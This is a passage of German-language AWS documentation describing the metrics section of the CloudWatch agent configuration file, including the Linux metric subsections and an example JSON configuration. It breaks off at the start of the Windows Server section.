einschließlich benutzerdefinierter Metriken, die mit StatsD oder collectd erfasst werden. Dieser Abschnitt enthält mehrere Unterabschnitte. Der Inhalt des metrics_collected -Abschnitts hängt davon ab, ob diese Konfigurationsdatei für einen Server mit Linux oder Windows Server vorgesehen ist. metrics_destinations – Optional. Gibt ein oder mehrere Ziele für alle in metrics_collected definierten Metriken an. Wenn dies hier angegeben wird, überschreibt es das Standardziel von cloudwatch . cloudwatch — Amazon CloudWatch. amp : Amazon Managed Service für Prometheus workspace_id : Die ID, die dem Workspace in Amazon Managed Service für Prometheus entspricht. { "metrics": { "metrics_destinations": { "cloudwatch": { }, "amp": { "workspace_id": "ws-abcd1234-ef56-7890-ab12-example" } } } } force_flush_interval – Gibt die maximale Zeitspanne in Sekunden an, in der Metriken im Speicherpuffer verbleiben, bevor sie an den Server gesendet werden. Unabhängig von dieser Einstellung werden die Metriken sofort an den Server gesendet, sobald die Größe der Metriken im Puffer 1 MB oder 1 000 verschiedene Metriken erreicht. Der Standardwert lautet 60. credentials – Gibt eine IAM-Rolle an, die beim Senden von Metriken an ein anderes Konto verwendet werden soll. Sofern angegeben, enthält dieses Feld einen Parameter, role_arn . role_arn – Gibt den ARN einer IAM-Rolle für die Authentifizierung beim Senden von Metriken an ein anderes Konto an. Weitere Informationen finden Sie unter Metriken, Protokolle und Ablaufverfolgungen an ein anderes Konto senden . Wenn dieser Wert hier angegeben wird, überschreibt er den role_arn im Abschnitt agent der Konfigurationsdatei, sofern vorhanden. service.name – Optional. Gibt den Servicenamen an, der verwendet werden soll, um die Entität für die Suche nach zugehöriger Telemetrie mit Werten zu befüllen. deployment.environment – Optional. Gibt den Umgebungsnamen an, der verwendet werden soll, um die Entität für die Suche nach zugehöriger Telemetrie mit Werten zu befüllen. Linux-Abschnitt Auf Servern mit Linux kann der Abschnitt metrics_collected der Konfigurationsdatei auch die folgenden Felder enthalten. Viele dieser Felder können measurement -Bereiche enthalten, in denen die Metriken aufgelistet werden, die Sie für diese Ressource erfassen möchten. In diesen measurement -Abschnitten können Sie entweder den vollständigen Metriknamen, wie z. B. swap_used , oder nur den Teil des Metriknamens, der an die Typ der Ressource angehängt wird. Beispiel: Die Angabe von reads im Abschnitt measurement des Abschnitts diskio bewirkt, dass die Metrik diskio_reads erfasst wird. collectd – Optional. Gibt an, dass Sie benutzerdefinierte Metriken mithilfe des Protokolls collectd abrufen möchten. Sie verwenden collectd Software, um die Metriken an den CloudWatch Agenten zu senden. Weitere Informationen zu den Konfigurationsoptionen, die für collectd verfügbar sind, finden Sie unter Abrufen benutzerdefinierter Metriken mit collectd . cpu – Optional. Gibt an, dass CPU-Metriken erfasst werden sollen. Dieser Abschnitt gilt nur für Linux-Instances. Sie müssen mindestens eines der resources - und totalcpu -Felder für alle zu erfassenden CPU-Metriken einschließen. Dieser Abschnitt kann die folgenden Felder enthalten: drop_original_metrics – Optional. Wenn Sie das aggregation_dimensions -Feld im metrics -Abschnitt verwenden, um Metriken zu aggregierten Ergebnissen zusammenzufassen, dann sendet der Agent standardmäßig sowohl die aggregierten Metriken als auch die ursprünglichen Metriken, die für jeden Wert der Dimension getrennt sind. Wenn Sie nicht möchten, dass die ursprünglichen Metriken an gesendet werden CloudWatch, können Sie diesen Parameter mit einer Liste von Metriken angeben. Für die zusammen mit diesem Parameter angegebenen Metriken werden keine Kennzahlen nach Dimension gemeldet CloudWatch. Stattdessen werden nur die aggregierten Metriken gemeldet. Dadurch verringert sich die Anzahl der Metriken, die der Agent erfasst, was Ihre Kosten senkt. resources – Optional. Geben Sie dieses Feld mit dem Wert * an, um zu bewirken, dass pro CPU-Metriken erfasst werden. Der einzige zulässige Wert ist * . totalcpu – Optional. Gibt an, ob CPU-Metriken gesammelt über alle CPU-Kerne hinweg gemeldet werden sollen. Der Standardwert ist true. measurement – Gibt das Array der zu erfassenden CPU-Metriken an. Mögliche Werte sind time_active , time_guest , time_guest_nice , time_idle , time_iowait , time_irq , time_nice , time_softirq , time_steal , time_system , time_user , usage_active , usage_guest , usage_guest_nice , usage_idle , usage_iowait , usage_irq , usage_nice , usage_softirq , usage_steal , usage_system und usage_user . Dieses Feld muss angegeben werden, wenn Sie cpu einbeziehen. Standardmäßig ist die Einheit für cpu_usage_* -Metriken Percent ; cpu_time_* -Metriken sind einheitenlos. Im Eintrag für jede einzelne Metrik können Sie optional einen oder beide der folgenden Werte angeben: rename – Legt einen anderen Namen für diese Metrik fest. unit – Gibt die zu verwendende Einheit für diese Metrik an und überschreibt die Standardeinheit für die Metrik ( None ). Bei der von Ihnen angegebenen Einheit muss es sich um eine gültige CloudWatch metrische Einheit handeln, wie in der Unit Beschreibung unter aufgeführt MetricDatum . metrics_collection_interval – Optional. Gibt an, wie oft die CPU-Metriken erfasst werden und das globale metrics_collection_interval im Abschnitt agent der Konfigurationsdatei überschrieben wird. Der Wert wird in Sekunden angegeben. Beispiel: Angeben, dass 10 Metriken alle 10 Sekunden und 300 Metriken alle 5 Minuten gesammelt werden sollen. Wenn Sie diesen Wert auf weniger als 60 Sekunden festlegen, wird die jeweilige Metrik als hochauflösende Metrik erfasst. Weitere Informationen zu hochauflösenden Metriken finden Sie unter Hochauflösende Metriken . append_dimensions – Optional. Zusätzliche Dimensionen, die nur für die CPU-Metriken verwendet werden sollen. Falls Sie dieses Feld angeben, wird es zusätzlich zu den im globalen Feld append_dimensions angegebenen Dimensionen verwendet, das für alle Typen von Metriken verwendet wird, die vom Agenten erfasst werden. disk – Optional. Gibt an, dass Datenträger-Metriken erfasst werden sollen. Erfasst Metriken nur für bereitgestellte Volumes. Dieser Abschnitt gilt nur für Linux-Instances. Dieser Abschnitt kann die folgenden Felder enthalten: drop_original_metrics – Optional. Wenn Sie das aggregation_dimensions -Feld im metrics -Abschnitt verwenden, um Metriken zu aggregierten Ergebnissen zusammenzufassen, dann sendet der Agent standardmäßig sowohl die aggregierten Metriken als auch die ursprünglichen Metriken, die für jeden Wert der Dimension getrennt sind. Wenn Sie nicht möchten, dass die ursprünglichen Messwerte gesendet werden CloudWatch, können Sie diesen Parameter mit einer Liste von Metriken angeben. Für die zusammen mit diesem Parameter angegebenen Metriken werden keine Kennzahlen nach Dimension gemeldet CloudWatch. Stattdessen werden nur die aggregierten Metriken gemeldet. Dadurch verringert sich die Anzahl der Metriken, die der Agent erfasst, was Ihre Kosten senkt. resources – Optional. Gibt ein Array von Datenträger-Mountingpunkten an. Dieses Feld beschränkt CloudWatch sich darauf, nur Metriken von den aufgelisteten Einhängepunkten zu sammeln. Sie können * als Wert festlegen, um Metriken von allen Mountingpunkten zu erfassen. Standardmäßig werden Metriken von allen Mountingpunkten erfasst. measurement – Gibt das Array der zu erfassenden Disk-Metriken an. Mögliche Werte sind free , total , used , used_percent , inodes_free , inodes_used und inodes_total . Dieses Feld muss angegeben werden, wenn Sie disk einbeziehen. Anmerkung Die disk -Metriken haben eine Dimension für Partition , was bedeutet, dass die Anzahl der generierten benutzerdefinierten Metriken von der Anzahl der Partitionen abhängt, die Ihrer Instance zugeordnet sind. Die Anzahl der Festplattenpartitionen hängt davon ab, welches AMI Sie verwenden, und wie viele Amazon-EBS-Volumes Sie an den Server anfügen. Informationen zum Anzeigen der Standardeinheiten für jede disk -Metrik finden Sie unter Vom CloudWatch Agenten auf Linux- und macOS-Instances gesammelte Metriken . Im Eintrag für jede einzelne Metrik können Sie optional einen oder beide der folgenden Werte angeben: rename – Legt einen anderen Namen für diese Metrik fest. unit – Gibt die zu verwendende Einheit für diese Metrik an und überschreibt die Standardeinheit für die Metrik ( None von None ). Bei der von Ihnen angegebenen Einheit muss es sich um eine gültige CloudWatch metrische Einheit handeln, wie in der Unit Beschreibung unter aufgeführt MetricDatum . ignore_file_system_types – Gibt Dateisystemtypen an, die beim Erfassen von Datenträgermetriken ausgeschlossen werden sollen. Gültige Werte sind sysfs , devtmpfs usw. drop_device – Wenn Sie dies auf true setzen, wird Device nicht als Dimension für Datenträgermetriken aufgenommen. Verhindern, dass Device als Dimension verwendet wird, kann auf Instances nützlich sein, die das Nitro-System verwenden, da sich die Gerätenamen auf diesen Instances bei jedem Datenträger-Mount ändern, wenn die Instance neu gestartet wird. Dies kann dazu führen, dass inkonsistente Daten in Ihren -Metriken und dazu führen, dass Alarme, die auf diesen Metriken basieren, in den Status INSUFFICIENT DATA übergehen. Der Standardwert ist false . metrics_collection_interval – Optional. Gibt an, wie oft die Datenträger-Metriken erfasst werden und das globale metrics_collection_interval im Abschnitt agent der Konfigurationsdatei überschrieben wird. Der Wert wird in Sekunden angegeben. Wenn Sie diesen Wert auf weniger als 60 Sekunden festlegen, wird die jeweilige Metrik als hochauflösende Metrik erfasst. Weitere Informationen finden Sie unter Hochauflösende Metriken . append_dimensions – Optional. Geben Sie Schlüssel-Wert-Paare an, die als zusätzliche Dimensionen nur für die Festplattenmetriken verwendet werden sollen. Falls Sie dieses Feld angeben, wird es zusätzlich zu den im append_dimensions -Feld angegebenen Dimensionen verwendet, das für alle Typen von Metriken verwendet wird, die vom Agent erfasst werden. Ein Schlüssel-Wert-Paar, das Sie verwenden können, ist das Folgende. Sie können auch andere benutzerdefinierte Schlüssel-Wert-Paare festlegen. "VolumeId":"$ { aws:VolumeId}" fügt den Festplattenmetriken des Blockgeräts eine VolumeId -Dimension hinzu. Für Amazon-EBS-Volumes ist dies die Amazon-EBS-Volume-ID. EC2 Beispielsweise speichern, dies wird die Seriennummer des Geräts sein. Um dies zu verwenden, muss der Parameter drop_device auf false gesetzt sein. diskio – Optional. Gibt an, dass i/o Festplattenmetriken erfasst werden sollen. Dieser Abschnitt gilt nur für Linux-Instances. Dieser Abschnitt kann die folgenden Felder enthalten: drop_original_metrics – Optional. Wenn Sie das aggregation_dimensions -Feld im metrics -Abschnitt verwenden, um Metriken zu aggregierten Ergebnissen zusammenzufassen, dann sendet der Agent standardmäßig sowohl die aggregierten Metriken als auch die ursprünglichen Metriken, die für jeden Wert der Dimension getrennt sind. Wenn Sie nicht möchten, dass die ursprünglichen Metriken an gesendet werden CloudWatch, können Sie diesen Parameter mit einer Liste von Metriken angeben. Für die zusammen mit diesem Parameter angegebenen Metriken werden keine Kennzahlen nach Dimension gemeldet CloudWatch. Stattdessen werden nur die aggregierten Metriken gemeldet. Dadurch verringert sich die Anzahl der Metriken, die der Agent erfasst, was Ihre Kosten senkt. resources – Optional. Wenn Sie eine Reihe von Geräten angeben, werden nur Messwerte von diesen Geräten CloudWatch erfasst. Andernfalls werden Metriken für alle Geräte erfasst. Sie können auch * als Wert festlegen, um Metriken von allen Geräten zu erfassen. measurement — Gibt das Array von Diskio- und AWS NVMe Treibermetriken an, die für Amazon EBS-Volumes und Instance-Speicher-Volumes, die an EC2 Amazon-Instances angehängt sind, erfasst werden sollen. Mögliche diskio-Werte sind reads , writes , read_bytes , write_bytes , read_time , write_time , io_time und iops_in_progress . Eine Liste der NVMe Treibermetriken für Amazon EBS-Volumes und Amazon EC2 Instance Store-Volumes finden Sie unter Erfassen Sie Amazon NVMe EBS-Treibermetriken und Erfassung von NVMe Volumen-Treibermetriken für EC2 Amazon-Instance-Speicher . Dieses Feld muss angegeben werden, wenn Sie diskio einbeziehen. Im Eintrag für jede einzelne Metrik können Sie optional einen oder beide der folgenden Werte angeben: rename – Legt einen anderen Namen für diese Metrik fest. unit – Gibt die zu verwendende Einheit für diese Metrik an und überschreibt die Standardeinheit für die Metrik ( None von None ). Bei der von Ihnen angegebenen Einheit muss es sich um eine gültige CloudWatch metrische Einheit handeln, wie in der Unit Beschreibung unter aufgeführt. MetricDatum Informationen zu Standardeinheiten und eine Beschreibung der Metriken finden Sie unter Erfassen Sie Amazon NVMe EBS-Treibermetriken . metrics_collection_interval – Optional. Gibt an, wie oft die diskio-Metriken erfasst werden und das globale metrics_collection_interval im Abschnitt agent der Konfigurationsdatei überschrieben wird. Der Wert wird in Sekunden angegeben. Wenn Sie diesen Wert auf weniger als 60 Sekunden festlegen, wird die jeweilige Metrik als hochauflösende Metrik erfasst. Weitere Informationen zu hochauflösenden Metriken finden Sie unter Hochauflösende Metriken . append_dimensions – Optional. Zusätzliche Dimensionen, die nur für die diskio-Metriken verwendet werden sollen. Falls Sie dieses Feld angeben, wird es zusätzlich zu den im append_dimensions -Feld angegebenen Dimensionen verwendet, das für alle Typen von Metriken verwendet wird, die vom Agent erfasst werden. swap – Optional. Gibt an, dass Swap-Arbeitsspeicher-Metriken erfasst werden sollen. Dieser Abschnitt gilt nur für Linux-Instances. Dieser Abschnitt kann die folgenden Felder enthalten: drop_original_metrics – Optional. Wenn Sie das aggregation_dimensions -Feld im metrics -Abschnitt verwenden, um Metriken zu aggregierten Ergebnissen zusammenzufassen, dann sendet der Agent standardmäßig sowohl die aggregierten Metriken als auch die ursprünglichen Metriken, die für jeden Wert der Dimension getrennt sind. Wenn Sie nicht möchten, dass die ursprünglichen Messwerte gesendet werden CloudWatch, können Sie diesen Parameter mit einer Liste von Metriken angeben. Für die zusammen mit diesem Parameter angegebenen Metriken werden keine Kennzahlen nach Dimension gemeldet CloudWatch. Stattdessen werden nur die aggregierten Metriken gemeldet. Dadurch verringert sich die Anzahl der Metriken, die der Agent erfasst, was Ihre Kosten senkt. measurement – Gibt das Array der zu erfassenden Swap-Metriken an. Mögliche Werte sind free , used und used_percent . Dieses Feld muss angegeben werden, wenn Sie swap einbeziehen. Informationen zum Anzeigen der Standardeinheiten für jede swap -Metrik finden Sie unter Vom CloudWatch Agenten auf Linux- und macOS-Instances gesammelte Metriken . Im Eintrag für jede einzelne Metrik können Sie optional einen oder beide der folgenden Werte angeben: rename – Legt einen anderen Namen für diese Metrik fest. unit – Gibt die zu verwendende Einheit für diese Metrik an und überschreibt die Standardeinheit für die Metrik ( None von None ). Bei der von Ihnen angegebenen Einheit muss es sich um eine gültige CloudWatch metrische Einheit handeln, wie in der Unit Beschreibung unter aufgeführt MetricDatum . metrics_collection_interval – Optional. Gibt an, wie oft die Swap-Metriken erfasst werden und das globale metrics_collection_interval im Abschnitt agent der Konfigurationsdatei überschrieben wird. Der Wert wird in Sekunden angegeben. Wenn Sie diesen Wert auf weniger als 60 Sekunden festlegen, wird die jeweilige Metrik als hochauflösende Metrik erfasst. Weitere Informationen zu hochauflösenden Metriken finden Sie unter Hochauflösende Metriken . append_dimensions – Optional. Zusätzliche Dimensionen, die nur für die Swap-Metriken verwendet werden sollen. Falls Sie dieses Feld angeben, wird es zusätzlich zu den im globalen append_dimensions -Feld angegebenen Dimensionen verwendet, das für alle Typen von Metriken verwendet wird, die vom Agent erfasst werden. Der Wert wird als hochauflösende Metrik erfasst. mem – Optional. Gibt an, dass Arbeitsspeicher-Metriken erfasst werden sollen. Dieser Abschnitt gilt nur für Linux-Instances. Dieser Abschnitt kann die folgenden Felder enthalten: drop_original_metrics – Optional. Wenn Sie das aggregation_dimensions -Feld im metrics -Abschnitt verwenden, um Metriken zu aggregierten Ergebnissen zusammenzufassen, dann sendet der Agent standardmäßig sowohl die aggregierten Metriken als auch die ursprünglichen Metriken, die für jeden Wert der Dimension getrennt sind. Wenn Sie nicht möchten, dass die ursprünglichen Messwerte gesendet werden CloudWatch, können Sie diesen Parameter mit einer Liste von Metriken angeben. Für die zusammen mit diesem Parameter angegebenen Metriken werden keine Kennzahlen nach Dimension gemeldet CloudWatch. Stattdessen werden nur die aggregierten Metriken gemeldet. Dadurch verringert sich die Anzahl der Metriken, die der Agent erfasst, was Ihre Kosten senkt. measurement – Gibt das Array der zu erfassenden Arbeitsspeicher-Metriken an. Mögliche Werte sind active , available , available_percent , buffered , cached , free , inactive , shared , total , used und used_percent . Dieses Feld muss angegeben werden, wenn Sie mem einbeziehen. Informationen zum Anzeigen der Standardeinheiten für jede mem -Metrik finden Sie unter Vom CloudWatch Agenten auf Linux- und macOS-Instances gesammelte Metriken . Im Eintrag für jede einzelne Metrik können Sie optional einen oder beide der folgenden Werte angeben: rename – Legt einen anderen Namen für diese Metrik fest. unit – Gibt die zu verwendende Einheit für diese Metrik an und überschreibt die Standardeinheit für die Metrik ( None ). Bei der von Ihnen angegebenen Einheit muss es sich um eine gültige CloudWatch metrische Einheit handeln, wie in der Unit Beschreibung unter aufgeführt MetricDatum . metrics_collection_interval – Optional. Gibt an, wie oft die mem-Metriken erfasst werden und das globale metrics_collection_interval im Abschnitt agent der Konfigurationsdatei überschrieben wird. Der Wert wird in Sekunden angegeben. Wenn Sie diesen Wert auf weniger als 60 Sekunden festlegen, wird die jeweilige Metrik als hochauflösende Metrik erfasst. Weitere Informationen zu hochauflösenden Metriken finden Sie unter Hochauflösende Metriken . append_dimensions – Optional. Zusätzliche Dimensionen, die nur für die mem-Metriken verwendet werden sollen. Falls Sie dieses Feld angeben, wird es zusätzlich zu den im Feld append_dimensions angegebenen Dimensionen verwendet, das für alle Typen von Metriken verwendet wird, die vom Agenten erfasst werden. net – Optional. Gibt an, dass Netzwerk-Metriken erfasst werden sollen. Dieser Abschnitt gilt nur für Linux-Instances. Dieser Abschnitt kann die folgenden Felder enthalten: drop_original_metrics – Optional. Wenn Sie das aggregation_dimensions -Feld im metrics -Abschnitt verwenden, um Metriken zu aggregierten Ergebnissen zusammenzufassen, dann sendet der Agent standardmäßig sowohl die aggregierten Metriken als auch die ursprünglichen Metriken, die für jeden Wert der Dimension getrennt sind. Wenn Sie nicht möchten, dass die ursprünglichen Messwerte gesendet werden CloudWatch, können Sie diesen Parameter mit einer Liste von Metriken angeben. Für die zusammen mit diesem Parameter angegebenen Metriken werden keine Kennzahlen nach Dimension gemeldet CloudWatch. Stattdessen werden nur die aggregierten Metriken gemeldet. Dadurch verringert sich die Anzahl der Metriken, die der Agent erfasst, was Ihre Kosten senkt. resources – Optional. Wenn Sie ein Array von Netzwerkschnittstellen angeben, werden nur Metriken von diesen Schnittstellen CloudWatch erfasst. Andernfalls werden Metriken für alle Geräte erfasst. Sie können auch * als Wert festlegen, um Metriken von allen Schnittstellen zu erfassen. measurement – Gibt das Array der zu erfassenden Netzwerk-Metriken an. Mögliche Werte sind bytes_sent , bytes_recv , drop_in , drop_out , err_in , err_out , packets_sent und packets_recv . Dieses Feld muss angegeben werden, wenn Sie net einbeziehen. Informationen zum Anzeigen der Standardeinheiten für jede net -Metrik finden Sie unter Vom CloudWatch Agenten auf Linux- und macOS-Instances gesammelte Metriken . Im Eintrag für jede einzelne Metrik können Sie optional einen oder beide der folgenden Werte angeben: rename – Legt einen anderen Namen für diese Metrik fest. unit – Gibt die zu verwendende Einheit für diese Metrik an und überschreibt die Standardeinheit für die Metrik ( None ). Bei der von Ihnen angegebenen Einheit muss es sich um eine gültige CloudWatch metrische Einheit handeln, wie in der Unit Beschreibung unter aufgeführt MetricDatum . metrics_collection_interval – Optional. Gibt an, wie oft die net-Metriken erfasst werden und das globale metrics_collection_interval im Abschnitt agent der Konfigurationsdatei überschrieben wird. Der Wert wird in Sekunden angegeben. Beispiel: Angeben, dass 10 Metriken alle 10 Sekunden und 300 Metriken alle 5 Minuten gesammelt werden sollen. Wenn Sie diesen Wert auf weniger als 60 Sekunden festlegen, wird die jeweilige Metrik als hochauflösende Metrik erfasst. Weitere Informationen zu hochauflösenden Metriken finden Sie unter Hochauflösende Metriken . append_dimensions – Optional. Zusätzliche Dimensionen, die nur für die net-Metriken verwendet werden sollen. Falls Sie dieses Feld angeben, wird es zusätzlich zu den im Feld append_dimensions angegebenen Dimensionen verwendet, das für alle Typen von Metriken verwendet wird, die vom Agent erfasst werden. netstat – Optional. Gibt an, dass TCP-Verbindungsstatus und UDP-Verbindungsmetriken gesammelt werden sollen. Dieser Abschnitt gilt nur für Linux-Instances. Dieser Abschnitt kann die folgenden Felder enthalten: drop_original_metrics – Optional. Wenn Sie das aggregation_dimensions -Feld im metrics -Abschnitt verwenden, um Metriken zu aggregierten Ergebnissen zusammenzufassen, dann sendet der Agent standardmäßig sowohl die aggregierten Metriken als auch die ursprünglichen Metriken, die für jeden Wert der Dimension getrennt sind. Wenn Sie nicht möchten, dass die ursprünglichen Messwerte gesendet werden CloudWatch, können Sie diesen Parameter mit einer Liste von Metriken angeben. Für die zusammen mit diesem Parameter angegebenen Metriken werden keine Kennzahlen nach Dimension gemeldet CloudWatch. Stattdessen werden nur die aggregierten Metriken gemeldet. Dadurch verringert sich die Anzahl der Metriken, die der Agent erfasst, was Ihre Kosten senkt. measurement – Gibt das Array der zu erfassenden Netstat-Metriken an. Mögliche Werte sind tcp_close , tcp_close_wait , tcp_closing , tcp_established , tcp_fin_wait1 , tcp_fin_wait2 , tcp_last_ack , tcp_listen , tcp_none , tcp_syn_sent , tcp_syn_recv , tcp_time_wait und udp_socket . Dieses Feld muss angegeben werden, wenn Sie netstat einbeziehen. Informationen zum Anzeigen der Standardeinheiten für jede netstat -Metrik finden Sie unter Vom CloudWatch Agenten auf Linux- und macOS-Instances gesammelte Metriken . Im Eintrag für jede einzelne Metrik können Sie optional einen oder beide der folgenden Werte angeben: rename – Legt einen anderen Namen für diese Metrik fest. unit – Gibt die zu verwendende Einheit für diese Metrik an und überschreibt die Standardeinheit für die Metrik ( None ). Bei der von Ihnen angegebenen Einheit muss es sich um eine gültige CloudWatch metrische Einheit handeln, wie in der Unit Beschreibung unter aufgeführt MetricDatum . metrics_collection_interval – Optional. Gibt an, wie oft die netstat-Metriken erfasst werden und das globale metrics_collection_interval im Abschnitt agent der Konfigurationsdatei überschrieben wird. Der Wert wird in Sekunden angegeben. Wenn Sie diesen Wert auf weniger als 60 Sekunden festlegen, wird die jeweilige Metrik als hochauflösende Metrik erfasst. Weitere Informationen zu hochauflösenden Metriken finden Sie unter Hochauflösende Metriken . append_dimensions – Optional. Zusätzliche Dimensionen, die nur für die netstat-Metriken verwendet werden sollen. Falls Sie dieses Feld angeben, wird es zusätzlich zu den im Feld append_dimensions angegebenen Dimensionen verwendet, das für alle Typen von Metriken verwendet wird, die vom Agent erfasst werden. processes – Optional. Gibt an, dass Prozess-Metriken erfasst werden sollen. Dieser Abschnitt gilt nur für Linux-Instances. Dieser Abschnitt kann die folgenden Felder enthalten: drop_original_metrics – Optional. Wenn Sie das aggregation_dimensions -Feld im metrics -Abschnitt verwenden, um Metriken zu aggregierten Ergebnissen zusammenzufassen, dann sendet der Agent standardmäßig sowohl die aggregierten Metriken als auch die ursprünglichen Metriken, die für jeden Wert der Dimension getrennt sind. Wenn Sie nicht möchten, dass die ursprünglichen Messwerte gesendet werden CloudWatch, können Sie diesen Parameter mit einer Liste von Metriken angeben. Für die zusammen mit diesem Parameter angegebenen Metriken werden keine Kennzahlen nach Dimension gemeldet CloudWatch. Stattdessen werden nur die aggregierten Metriken gemeldet. Dadurch verringert sich die Anzahl der Metriken, die der Agent erfasst, was Ihre Kosten senkt. measurement – Gibt das Array der zu erfassenden Prozess-Metriken an. Mögliche Werte sind blocked , dead , idle , paging , running , sleeping , stopped , total , total_threads , wait und zombies . Dieses Feld muss angegeben werden, wenn Sie processes einbeziehen. Für alle processes -Metriken lautet die Standardeinheit None . Im Eintrag für jede einzelne Metrik können Sie optional einen oder beide der folgenden Werte angeben: rename – Legt einen anderen Namen für diese Metrik fest. unit – Gibt die zu verwendende Einheit für diese Metrik an und überschreibt die Standardeinheit für die Metrik ( None ). Bei der von Ihnen angegebenen Einheit muss es sich um eine gültige CloudWatch metrische Einheit handeln, wie in der Unit Beschreibung unter aufgeführt MetricDatum . metrics_collection_interval – Optional. Gibt an, wie oft die Prozess-Metriken erfasst werden und das globale metrics_collection_interval im Abschnitt agent der Konfigurationsdatei überschrieben wird. Der Wert wird in Sekunden angegeben. Beispiel: Angeben, dass 10 Metriken alle 10 Sekunden und 300 Metriken alle 5 Minuten gesammelt werden sollen. Wenn Sie diesen Wert auf weniger als 60 Sekunden festlegen, wird die jeweilige Metrik als hochauflösende Metrik erfasst. Weitere Informationen finden Sie unter Hochauflösende Metriken . append_dimensions – Optional. Zusätzliche Dimensionen, die nur für die Prozess-Metriken verwendet werden sollen. Falls Sie dieses Feld angeben, wird es zusätzlich zu den im Feld append_dimensions angegebenen Dimensionen verwendet, das für alle Typen von Metriken verwendet wird, die vom Agent erfasst werden. nvidia_gpu – Optional. Gibt an, dass NVIDIA GPU-Metriken erfasst werden sollen. Dieser Abschnitt gilt nur für Linux-Instances auf Hosts, die mit einem NVIDIA GPU-Accelerator konfiguriert sind und auf denen das NVIDIA System Management Interface (nvidia-smi) installiert ist. Den erfassten NVIDIA GPU-Metriken wird die Zeichenfolge nvidia_smi_ vorangestellt, um sie von den Metriken zu unterscheiden, die für andere Accelerator-Typen erfasst wurden. Dieser Abschnitt kann die folgenden Felder enthalten: drop_original_metrics – Optional. Wenn Sie das aggregation_dimensions -Feld im metrics -Abschnitt verwenden, um Metriken zu aggregierten Ergebnissen zusammenzufassen, dann sendet der Agent standardmäßig sowohl die aggregierten Metriken als auch die ursprünglichen Metriken, die für jeden Wert der Dimension getrennt sind. Wenn Sie nicht möchten, dass die ursprünglichen Messwerte gesendet werden CloudWatch, können Sie diesen Parameter mit einer Liste von Metriken angeben. Für die zusammen mit diesem Parameter angegebenen Metriken werden keine Kennzahlen nach Dimension gemeldet CloudWatch. Stattdessen werden nur die aggregierten Metriken gemeldet. Dadurch verringert sich die Anzahl der Metriken, die der Agent erfasst, was Ihre Kosten senkt. measurement – Gibt das Array der zu erfassenden NVIDIA GPU-Metriken an. Eine Liste der möglichen Werte, die Sie hier verwenden können, finden Sie in der Spalte Metric (Metrik) in der Tabelle unter Erfassen von NVIDIA GPU-Metriken . Im Eintrag für jede einzelne Metrik können Sie optional einen oder beide der folgenden Werte angeben: rename – Legt einen anderen Namen für diese Metrik fest. unit – Gibt die zu verwendende Einheit für diese Metrik an und überschreibt die Standardeinheit für die Metrik ( None ). Bei der von Ihnen angegebenen Einheit muss es sich um eine gültige CloudWatch metrische Einheit handeln, wie in der Unit Beschreibung unter aufgeführt MetricDatum . metrics_collection_interval – Optional. Gibt an, wie oft die NVIDIA GPU-Metriken erfasst werden und das globale metrics_collection_interval im Abschnitt agent der Konfigurationsdatei überschrieben wird. jmx – Optional. Gibt an, dass Sie Java Management Extensions (JMX)-Metriken von der Instance abrufen möchten. Weitere Informationen zu den Parametern, die in diesem Abschnitt verwendet werden können, und den Metriken, die erfasst werden können, finden Sie unter Erfassung von Java Management Extensions (JMX)-Metriken . otlp – Optional. Gibt an, dass Sie Metriken aus dem OpenTelemetry SDK sammeln möchten. Weitere Informationen über die Felder, die Sie in diesem Abschnitt verwenden können, finden Sie unter Erfassen Sie Metriken und Traces mit OpenTelemetry . procstat – Optional. Gibt an, dass Sie Metriken aus einzelnen Prozessen abrufen möchten. Weitere Informationen zu den Konfigurationsoptionen, die für procstat verfügbar sind, finden Sie unter Erfassen von Prozessmetriken mit dem procstat-Plugin . statsd – Optional. Gibt an, dass Sie benutzerdefinierte Metriken mithilfe des Protokolls StatsD abrufen möchten. Der CloudWatch Agent fungiert als Daemon für das Protokoll. Sie verwenden einen beliebigen StatsD Standard-Client, um die Metriken an den CloudWatch Agenten zu senden. Weitere Informationen zu den Konfigurationsoptionen, die für StatsD verfügbar sind, finden Sie unter Abrufen benutzerdefinierter Metriken mit StatsD . ethtool – Optional. Gibt an, dass Sie Netzwerkmetriken mithilfe des ethtool -Plug-Ins abrufen möchten. Dieses Plugin kann sowohl die vom Standard-Ethtool-Hilfsprogramm gesammelten Metriken als auch die Netzwerkleistungsmetriken von EC2 Amazon-Instances importieren. Weitere Informationen zu den Konfigurationsoptionen, die für ethtool verfügbar sind, finden Sie unter Netzwerkleistungsmetriken sammeln . Es folgt das Beispiel eines metrics -Abschnitts für einen Linux-Server. In diesem Beispiel werden drei CPU-Metriken, drei netstat-Metriken, drei Prozessmetriken und eine Datenträgermetrik erfasst und der Agent ist zum Empfang zusätzlicher Metriken von einem collectd -Client eingerichtet. "metrics": { "aggregation_dimensions" : [["AutoScalingGroupName"], ["InstanceId", "InstanceType"],[]], "metrics_collected": { "collectd": { }, "cpu": { "resources": [ "*" ], "measurement": [ { "name": "cpu_usage_idle", "rename": "CPU_USAGE_IDLE", "unit": "Percent"}, { "name": "cpu_usage_nice", "unit": "Percent"}, "cpu_usage_guest" ], "totalcpu": false, "drop_original_metrics": [ "cpu_usage_guest" ], "metrics_collection_interval": 10, "append_dimensions": { "test": "test1", "date": "2017-10-01" } }, "netstat": { "measurement": [ "tcp_established", "tcp_syn_sent", "tcp_close" ], "metrics_collection_interval": 60 }, "disk": { "measurement": [ "used_percent" ], "resources": [ "*" ], "drop_device": true }, "processes": { "measurement": [ "running", "sleeping", "dead" ] } }, "append_dimensions": { "ImageId": "$ { aws:ImageId}", "InstanceId": "$ { aws:InstanceId}", "InstanceType": "$ { aws:InstanceType}", "AutoScalingGroupName": "$ { aws:AutoScalingGroupName}" } } Windows Server Im Abschnitt metrics_collected für Windows Server können Sie für jedes Windows-Leistungsobjekt Unterabschnitte anlegen, beispielsweise Memory , Processor und LogicalDisk . Informationen darüber, welche Objekte und Zähler verfügbar sind, finden Sie unter Leistungszähler in der Microsoft Windows-Dokumentation. Innerhalb des Unterabschnitts für jedes Objekt geben Sie ein measurement -Array der zu erfassenden Zähler an. Das measurement -Array ist für jedes Objekt erforderlich, das Sie in der Konfigurationsdatei angeben. Sie können auch ein resources -Feld angeben, um die Instances zu benennen, aus denen Sie Metriken erfassen. Sie können auch * für resources angeben, um separate Metriken für alle Instances zu erfassen. Wenn Sie resources bei Zählern mit Instances weglassen, werden die Daten für alle Instances in einem Satz zusammengefasst. Wenn Sie resources bei Zählern, die keine Instances haben, weglassen, werden die Zähler nicht vom Agenten erfasst. CloudWatch Um festzustellen, ob Zähler über Instances verfügen, können Sie einen der folgenden Befehle verwenden. Powershell: Get-Counter -ListSet * Befehlszeile 